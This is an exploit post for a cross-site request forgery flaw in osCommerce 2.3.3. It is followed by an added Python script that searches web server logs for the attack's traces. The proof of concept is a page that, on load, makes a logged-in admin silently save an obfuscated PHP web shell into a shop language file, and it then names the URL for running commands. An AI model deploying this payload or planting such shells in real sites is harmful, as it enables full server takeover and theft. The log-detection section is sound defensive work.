
osCommerce 2.3.3 Cross Site Request Forgery

Posted on 12 February 2013

<?php
/*
 * this is simple proof-of-c0ncept for csrf in latest osCommerce (2.3.3).
 *
 * Admin, after visiting this page, will add php-shell-code to file:
 * ./catalog/includes/languages/english/download.php, so now if we
 * add 'cmd' param to this file, our 'shell' will print command output.
 *
 * --- there should be more this kind of bugs in this webapp.
 * 22.o1.2o13 o/
 */
?>
<html><body onload="document.runCSRF.submit();">
<form method="post" name="runCSRF" action="http://oscommerce-2.3.3/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save">
<input type="hidden" name="file_contents" value="&#x3c;&#x3f;&#x70;&#x68;&#x70;&#x20;&#x24;&#x63;&#x6d;&#x64;&#x20;&#x3d;&#x20;&#x24;&#x5f;&#x47;&#x45;&#x54;&#x5b;&#x27;&#x63;&#x6d;&#x64;&#x27;&#x5d;&#x3b;&#x20;&#x65;&#x63;&#x68;&#x6f;&#x20;&#x27;&#x3c;&#x70;&#x72;&#x65;&#x3e;&#x27;&#x20;&#x2e;&#x20;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x5f;&#x65;&#x78;&#x65;&#x63;&#x28;&#x24;&#x63;&#x6d;&#x64;&#x29;&#x20;&#x2e;&#x20;&#x27;&#x3c;&#x2f;&#x70;&#x72;&#x65;&#x3e;&#x27;&#x3b;&#x20;&#x3f;&#x3e;">
</form>your shell should be here: catalog/includes/languages/english/download.php?cmd=id<br></body></html>
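For defenders reviewing web server logs, the request pattern this proof-of-concept produces can be searched for as follows. This is an added example, not part of the original post: it assumes Apache combined log format, `SITE_HOST` is a hypothetical hostname for the shop, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

SITE_HOST = "shop.example"  # assumption: hostname the admin panel is served from

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = '''\
203.0.113.5 - - [12/Feb/2013:10:00:01 +0000] "POST /catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save HTTP/1.1" 302 - "http://attacker.example/page.html" "Mozilla/5.0"
203.0.113.5 - - [12/Feb/2013:10:03:10 +0000] "POST /catalog/admin/define_language.php?lngdir=english&filename=english/index.php&action=save HTTP/1.1" 302 - "http://shop.example/catalog/admin/define_language.php?lngdir=english&filename=english/index.php" "Mozilla/5.0"
198.51.100.7 - - [12/Feb/2013:10:05:42 +0000] "GET /catalog/includes/languages/english/download.php?cmd=id HTTP/1.1" 200 57 "-" "curl/7.28"
198.51.100.7 - - [12/Feb/2013:10:06:00 +0000] "GET /catalog/index.php?language=en HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"')

def find_csrf_indicators(log_text, site_host=SITE_HOST):
    """Return findings as (kind, client_ip, timestamp, language_file) tuples."""
    findings = []
    written = set()  # language files saved through a cross-site request
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, status, referer = m.groups()
        url = urlsplit(target)
        qs = parse_qs(url.query)
        # 1. Save action in the language editor whose Referer is missing or off-site.
        if (method == "POST" and url.path.endswith("/admin/define_language.php")
                and qs.get("action") == ["save"]):
            ref_host = urlsplit(referer).hostname  # None for "-" or empty Referer
            if ref_host != site_host:
                fname = qs.get("filename", ["?"])[0]
                written.add(fname)
                findings.append(("cross-site-save", ip, ts, fname))
        # 2. Direct request with a query string to a language file saved that way.
        elif "/includes/languages/" in url.path and url.query:
            rel = url.path.split("/includes/languages/", 1)[1]
            if rel in written:
                findings.append(("direct-hit-on-modified-file", ip, ts, rel))
    return findings

if __name__ == "__main__":
    for finding in find_csrf_indicators(SAMPLE_LOG):
        print(*finding, sep="  ")
```

A Referer can be stripped by browsers or proxies, so a missing value is flagged for review rather than treated as proof; any file named in a finding should be compared against a known-good copy.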

 
